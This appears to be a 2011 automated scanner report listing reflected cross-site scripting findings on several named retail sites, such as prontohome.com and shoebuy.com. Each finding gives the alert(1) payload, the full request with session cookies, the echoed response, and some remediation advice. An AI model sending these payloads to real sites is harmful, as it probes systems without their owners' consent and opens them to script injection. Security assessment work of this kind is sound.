GET /home-office-furniture?545c9'><script>alert(1)</script>09f7f268f88=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9fd3c'><script>alert(1)</script>59df384b2b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2e3b9'><script>alert(1)</script>154a5974ddf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kitchen2e3b9'><script>alert(1)</script>154a5974ddf HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:41:45 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29082
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/kitchen2e3b9'><script>alert(1)</script>154a5974ddf' property='og:url'/> ...[SNIP]...
1.25. http://www.prontohome.com/kitchen [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/kitchen
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74be3'><script>alert(1)</script>cc45e27bab5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kitchen?74be3'><script>alert(1)</script>cc45e27bab5=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 92821'><script>alert(1)</script>f8c31378090 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kitchen-electrics92821'><script>alert(1)</script>f8c31378090 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:43:09 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29102
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/kitchen-electrics92821'><script>alert(1)</script>f8c31378090' property='og:url'/> ...[SNIP]...
1.27. http://www.prontohome.com/kitchen-electrics [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/kitchen-electrics
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44b38'><script>alert(1)</script>95e8bc74ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /kitchen-electrics?44b38'><script>alert(1)</script>95e8bc74ac9=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7310'><script>alert(1)</script>8a82b5ae842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lightinga7310'><script>alert(1)</script>8a82b5ae842 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:44:40 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/lightinga7310'><script>alert(1)</script>8a82b5ae842' property='og:url'/> ...[SNIP]...
1.29. http://www.prontohome.com/lighting [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/lighting
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 334ee'><script>alert(1)</script>b9dfa7332c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /lighting?334ee'><script>alert(1)</script>b9dfa7332c5=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 336de'><script>alert(1)</script>f95ddc7cbc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /living-room-furniture336de'><script>alert(1)</script>f95ddc7cbc6 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:36:55 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/living-room-furniture336de'><script>alert(1)</script>f95ddc7cbc6' property='og:url'/> ...[SNIP]...
1.31. http://www.prontohome.com/living-room-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/living-room-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7edfc'><script>alert(1)</script>34bf46ee745 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /living-room-furniture?7edfc'><script>alert(1)</script>34bf46ee745=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fde75'><script>alert(1)</script>df92503cd70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoor-furniturefde75'><script>alert(1)</script>df92503cd70 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
Response
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:37:28 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT _eep-Alive: timeout=15 _onnection: Keep-Alive Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Connection: close Content-Length: 29102
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/outdoor-furniturefde75'><script>alert(1)</script>df92503cd70' property='og:url'/> ...[SNIP]...
1.33. http://www.prontohome.com/outdoor-furniture [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/outdoor-furniture
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b675b'><script>alert(1)</script>e3b5613ab04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoor-furniture?b675b'><script>alert(1)</script>e3b5613ab04=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e3b5b'><script>alert(1)</script>78b7fb208d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bacc6"%3balert(1)//ffb4109eff1 was submitted in the cid parameter. This input was echoed as bacc6";alert(1)//ffb4109eff1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6b01"%3balert(1)//690101c6e9b was submitted in the pid parameter. This input was echoed as e6b01";alert(1)//690101c6e9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e40"%3balert(1)//66e5a2488da was submitted in the pt parameter. This input was echoed as 33e40";alert(1)//66e5a2488da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d6f0"%3balert(1)//964a2576563 was submitted in the u parameter. This input was echoed as 1d6f0";alert(1)//964a2576563 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.39. http://www.prontohome.com/pillows [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/pillows
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 38752'><script>alert(1)</script>2cc4258f12d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pillows?38752'><script>alert(1)</script>2cc4258f12d=1 HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8ac10'><script>alert(1)</script>2a05c130a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:40:05 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Proxy-Connection: Keep-Alive Content-Length: 29106
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontohome.com/recessed-lights-7upw8ac10'><script>alert(1)</script>2a05c130a2' property='og:url'/> ...[SNIP]...
1.41. http://www.prontohome.com/recessed-lights-7upw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontohome.com
Path:
/recessed-lights-7upw
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload df4b5'><script>alert(1)</script>c5160045d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
1.42. http://www.prontostyle.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontostyle.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 347fb'><script>alert(1)</script>1dbeedc5881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?347fb'><script>alert(1)</script>1dbeedc5881=1 HTTP/1.1 Host: www.prontostyle.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c967'><script>alert(1)</script>cd8b2c4200 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:37:43 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Proxy-Connection: Keep-Alive Content-Length: 27548
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontostyle.com/clogs-and-mules8c967'><script>alert(1)</script>cd8b2c4200' property='og:url'/> ...[SNIP]...
1.44. http://www.prontostyle.com/clogs-and-mules [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontostyle.com
Path:
/clogs-and-mules
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a9362'><script>alert(1)</script>bb021b31ebd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc0bc'><script>alert(1)</script>fe6ae21c5b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 570fa'><script>alert(1)</script>b07d312d210 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7490"%3balert(1)//154f20baccc was submitted in the cid parameter. This input was echoed as c7490";alert(1)//154f20baccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9df"%3balert(1)//a976e9f8b8 was submitted in the pid parameter. This input was echoed as 8c9df";alert(1)//a976e9f8b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b57d3"%3balert(1)//2ccd6799823 was submitted in the pt parameter. This input was echoed as b57d3";alert(1)//2ccd6799823 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6610"%3balert(1)//8ce1138ddc1 was submitted in the u parameter. This input was echoed as c6610";alert(1)//8ce1138ddc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e3f3'><script>alert(1)</script>0fdcf65e2b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Fri, 11 Feb 2011 14:27:33 GMT Server: Apache/2.2.4 (Fedora) Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Via: CN-5000 Proxy-Connection: Keep-Alive Content-Length: 27554
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http:// ...[SNIP]... <meta content='http://www.prontostyle.com/style/favicon.ico6e3f3'><script>alert(1)</script>0fdcf65e2b' property='og:url'/> ...[SNIP]...
1.52. http://www.prontotech.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.prontotech.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dae08'><script>alert(1)</script>5044edfd7f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?dae08'><script>alert(1)</script>5044edfd7f0=1 HTTP/1.1 Host: www.prontotech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20996'%3balert(1)//4080f57a871 was submitted in the c parameter. This input was echoed as 20996';alert(1)//4080f57a871 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pbar/pj.jsp?b=Skechers&c=20996'%3balert(1)//4080f57a871&d=Womens&i=%2Fpi%2Fskech%2Fskech374763_41836_lg.jpg&p=6 HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Referer: http://www.shoebuy.com/skechers-compulsions-crystalize/374763/798870?cm_mmc=dealtime-_-none-_-none-_-none Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ShoebuyPbar=; ShoebuyEntry=dealtime; NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660; sbver=a
The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 622e8'%3balert(1)//79fdfe3dae2 was submitted in the d parameter. This input was echoed as 622e8';alert(1)//79fdfe3dae2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pbar/pj.jsp?b=Skechers&c=&d=Womens622e8'%3balert(1)//79fdfe3dae2&i=%2Fpi%2Fskech%2Fskech374763_41836_lg.jpg&p=6 HTTP/1.1 Host: www.shoebuy.com Proxy-Connection: keep-alive Referer: http://www.shoebuy.com/skechers-compulsions-crystalize/374763/798870?cm_mmc=dealtime-_-none-_-none-_-none Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ShoebuyPbar=; ShoebuyEntry=dealtime; NSC_1-26STU9-qh10.101.208.14=ffffffff096d444545525d5f4f58455e445a4a423660; sbver=a
The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d382f'%3balert(1)//ae3a0aabed6 was submitted in the i parameter. This input was echoed as d382f';alert(1)//ae3a0aabed6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38dee'%3balert(1)//495bc098310 was submitted in the p parameter. This input was echoed as 38dee';alert(1)//495bc098310 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba68c"><script>alert(1)</script>de57eba1ae3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
